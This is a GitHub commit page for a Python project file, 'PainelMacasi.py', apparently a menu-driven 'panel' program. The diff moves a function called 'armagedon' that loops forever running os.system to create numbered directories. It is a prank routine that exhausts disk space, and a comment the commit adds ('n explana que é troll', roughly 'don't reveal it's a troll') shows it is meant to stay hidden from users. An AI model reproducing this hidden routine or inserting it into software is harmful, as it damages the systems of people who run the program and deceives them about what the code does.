Skip to content

Commit

Permalink
atualização do painel
Browse files Browse the repository at this point in the history
  • Loading branch information
cauabenigri committed Nov 25, 2021
1 parent d401b1f commit 584911b
Showing 1 changed file with 9 additions and 7 deletions.
16 changes: 9 additions & 7 deletions Python3/Projetos/PainelMacasi.py
Original file line number Diff line number Diff line change
Expand Up @@ -2,13 +2,6 @@
from time import sleep


def armagedon():
while True:
global contador
os.system(f'mkdir sefodeu{contador}vezes')
contador += 1


def clear():
print(os.name)
if os.name == 'posix':
Expand Down Expand Up @@ -37,6 +30,15 @@ def opcao():
return opc


# n explana que é troll!!


def armagedon():
while True:
global contador
os.system(f'mkdir sefodeu{contador}vezes')
contador += 1

def condicoes():
banner()
op = opcao()
Expand Down

0 comments on commit 584911b

Please sign in to comment.